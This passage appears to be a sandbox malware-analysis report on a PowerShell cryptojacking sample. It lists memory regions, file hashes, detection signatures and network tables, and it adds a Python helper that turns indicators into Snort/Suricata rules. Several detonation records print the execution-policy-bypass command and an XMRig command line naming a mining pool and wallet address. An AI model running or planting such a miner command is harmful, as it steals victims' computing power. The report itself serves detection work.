US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 248.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 98.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 95.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
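Most rows in this table are sandbox background: DNS to 8.8.8.8, PTR lookups for every address touched, and Edge and Windows housekeeping. The connections worth keeping are the GitHub download of the miner and the hand-off to the pool. As an added example (not part of the report), the Python below parses a subset of rows copied from this table, drops the noise under labelled heuristics, deduplicates the remaining destinations and renders them as Snort/Suricata rules; the noise lists and the sid range are assumptions to tune for your own environment.

```python
import ipaddress
import re

# Rows copied from the behavioral11 Network table above (Country Destination
# Domain Proto); rows without a Domain column are kept as they appear.
NETWORK_TABLE = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 216.58.215.42:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 www.microsoft.com udp
BE 23.55.97.181:80 www.microsoft.com tcp
US 8.8.8.8:53 udp
"""

# Assumed background noise for this sandbox image; adjust for your own telemetry.
RESOLVER_NOISE = {"8.8.8.8"}                        # the sandbox's DNS resolver
DOMAIN_NOISE = ("microsoft.com", "googleapis.com")  # OS/browser housekeeping, suffix match

ROW = re.compile(r"^(?P<cc>[A-Z]{2})\s+(?P<ip>[^\s:]+):(?P<port>\d+)"
                 r"(?:\s+(?P<domain>\S+))?\s+(?P<proto>tcp|udp)$")

def parse_rows(table):
    """Yield one dict per data row; raise on a row the regex cannot read."""
    for line in table.splitlines():
        line = line.strip()
        if not line or line.startswith("Country"):
            continue
        m = ROW.match(line)
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        yield {"cc": m["cc"], "ip": str(ipaddress.ip_address(m["ip"])),
               "port": int(m["port"]), "domain": m["domain"] or "", "proto": m["proto"]}

def is_noise(row):
    """True for resolver traffic, reverse lookups and allow-listed housekeeping domains."""
    d = row["domain"]
    if row["ip"] in RESOLVER_NOISE or d.endswith(".in-addr.arpa"):
        return True
    return any(d == s or d.endswith("." + s) for s in DOMAIN_NOISE)

def extract_iocs(table):
    """Return {(ip, port, proto): {"cc": str, "domains": [..]}} in first-seen order."""
    iocs = {}
    for row in parse_rows(table):
        if is_noise(row):
            continue
        entry = iocs.setdefault((row["ip"], row["port"], row["proto"]),
                                {"cc": row["cc"], "domains": []})
        if row["domain"] and row["domain"] not in entry["domains"]:
            entry["domains"].append(row["domain"])
    return iocs

def to_snort_rules(iocs, sid_base=9000001):
    """Render one alert rule per destination in Snort/Suricata syntax (sid range assumed free)."""
    rules = []
    for sid, ((ip, port, proto), meta) in enumerate(iocs.items(), start=sid_base):
        label = meta["domains"][0] if meta["domains"] else "unresolved"
        rules.append(f'alert {proto} $HOME_NET any -> {ip} {port} '
                     f'(msg:"xmrig sandbox IOC {label}"; sid:{sid}; rev:1;)')
    return rules

if __name__ == "__main__":
    for rule in to_snort_rules(extract_iocs(NETWORK_TABLE)):
        print(rule)
```

The unresolved 13.107.253.64:443 destination is deliberately kept: the script cannot tell Microsoft CDN traffic from a second-stage server without a domain, so that decision is left to the analyst rather than silently dropped. The GitHub addresses are shared CDN infrastructure and belong in a hunting query, not a block list; the pool address is the one destination here that can be blocked outright.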

Files

memory/2548-0-0x00007FFE5FD43000-0x00007FFE5FD45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ibf3jvya.f5i.psm1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2548-6-0x0000015DF4BD0000-0x0000015DF4BF2000-memory.dmp

memory/2548-11-0x00007FFE5FD40000-0x00007FFE60801000-memory.dmp

memory/2548-12-0x00007FFE5FD40000-0x00007FFE60801000-memory.dmp

memory/2548-13-0x00007FFE5FD40000-0x00007FFE60801000-memory.dmp

memory/2548-14-0x00007FFE5FD43000-0x00007FFE5FD45000-memory.dmp

memory/2548-15-0x00007FFE5FD40000-0x00007FFE60801000-memory.dmp

memory/2548-16-0x00007FFE5FD40000-0x00007FFE60801000-memory.dmp

memory/2548-18-0x00007FFE5FD40000-0x00007FFE60801000-memory.dmp

memory/2548-19-0x0000015DF7590000-0x0000015DF75A2000-memory.dmp

memory/2548-20-0x0000015DF7580000-0x0000015DF758A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3332-51-0x000001D04E1F0000-0x000001D04E210000-memory.dmp

memory/3332-52-0x000001D04FAF0000-0x000001D04FB10000-memory.dmp

memory/3332-53-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-54-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-56-0x000001D04FB30000-0x000001D04FB50000-memory.dmp

memory/3332-55-0x000001D04FB10000-0x000001D04FB30000-memory.dmp

memory/3332-57-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-58-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-60-0x000001D04FB30000-0x000001D04FB50000-memory.dmp

memory/3332-59-0x000001D04FB10000-0x000001D04FB30000-memory.dmp

memory/3332-61-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-62-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-63-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-64-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-65-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-66-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-67-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-68-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-69-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-70-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-71-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-72-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-73-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-74-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-75-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-76-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-77-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-78-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-79-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-80-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-81-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-82-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-83-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-84-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-85-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-86-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-87-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-88-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-89-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-90-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-91-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-92-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-93-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-94-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-95-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-96-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-97-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-98-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-99-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-100-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-101-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-102-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-103-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-104-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-105-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-106-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-107-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-108-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-109-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-110-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-111-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-112-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-113-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-114-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-115-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-116-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-117-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-118-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-119-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:57

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits, all columns N/A (the sandbox recorded no description, indicator, process or target for this signature)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/5068-0-0x00007FFF8D653000-0x00007FFF8D654000-memory.dmp

memory/5068-5-0x000001A8C4220000-0x000001A8C4242000-memory.dmp

memory/5068-8-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5068-9-0x000001A8C4450000-0x000001A8C44C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0q1fnv5k.rxy.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Note: PowerShell writes a __PSScriptPolicyTest_*.ps1 file itself when it probes the host's script policy (AppLocker/WDAC) at start-up; the MD5, SHA1 and SHA256 above are the well-known hashes of the single character "1", so this file is not an indicator of the sample.

memory/5068-18-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5068-25-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5068-48-0x000001A8C43F0000-0x000001A8C4402000-memory.dmp

memory/5068-61-0x000001A8C43D0000-0x000001A8C43DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1508-90-0x0000021EDCB60000-0x0000021EDCB80000-memory.dmp

memory/5068-92-0x00007FFF8D653000-0x00007FFF8D654000-memory.dmp

memory/1508-91-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/5068-93-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/1508-94-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/5068-95-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/1508-96-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-97-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-98-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-99-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-100-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-101-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-102-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-103-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-104-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-105-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-106-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-107-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-108-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-109-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-110-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-111-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-112-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-113-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-114-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-115-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-116-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-117-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-118-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-119-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-120-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-121-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-122-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-123-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-124-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-125-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-126-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-127-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-128-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-129-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-130-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-131-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-132-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-133-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-134-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-135-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-136-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-137-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-138-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-139-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-140-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-141-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-142-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-143-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-144-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-145-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-146-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-147-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-148-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-149-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-150-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-151-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-152-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-153-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-154-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-155-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-156-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:01

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits, all columns N/A (the sandbox recorded no description, indicator, process or target for this signature)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zpecwnkh.mq5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:07

Platform

win11-20240508-en

Max time kernel

1798s

Max time network

1758s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_efuheam3.ow5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:13

Platform

win11-20240508-en

Max time kernel

1800s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

